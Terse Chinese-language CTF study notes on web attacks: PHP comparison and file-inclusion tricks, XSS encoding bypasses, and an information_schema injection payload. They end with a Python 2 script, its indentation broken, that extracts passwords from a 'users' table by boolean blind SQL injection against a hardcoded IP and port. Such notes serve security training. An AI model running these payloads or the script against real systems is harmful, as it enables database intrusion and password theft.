信息收集

.git

.svn

.robots.txt

.swp vim的暂存

压缩文件

php

变量覆盖

extract()

$$k

trim去掉空格 除了0xf

parse_str()解析字符串为变量

== 类型不一定等 ===类型也要等

sha1加密失败返回NULL

switch没有break

array转换int 0或者1

0e科学计数法

ox 或者0x开头字符串等于16进制

%00截断

两个number可以绕过后一个

php伪协议

a=data:text/plain,<?php>

php://input enctype=”multipart/from-data”无效

php://filter/read=string.tolower/resource=test.php

include_once(“flag.php”);

反序列化

session反序列化 上传名字为序列化的文件

hackbar

xss

绕过

“data:text/javascript，alert(3);”

us-ascii

utf-7

multi-byte gbl

宽字节

%3c%27 alert(1) //

反序列化

session反序列化可以先创建个文件在远程

                                  table_scnema

column                     table_name

                              column_name

desc information_schema { schemata schem_name

tables                table_schema

                        table_name     

?id=1’ and ord(mid(‘select table_name from information_schema.tables limit 1,1’,1,1))>11%23

import requests

import base64

import time

import string

print ‘a’

def send(url,key1,value1):

value1 = base64.b64encode(value1)


data = {


    key1:value1,


}


response = requests.post(url,data=data)


content = response.content





if "Alix" in content:


    return True


else:


    return False

str = string.printable

def main():

found = ""


for i in range(1, 80):





    for j in range(1, 123):






        _username = "nothing' or ascii(mid((select group_concat(password) from users), %d, 1))=%d#" % (i, j)






        _password="amin"


        print _username


        if send('http://128.199.224.175:24000/', 'spy_name',_username):


            found +=chr(j)


            print found


            break

main()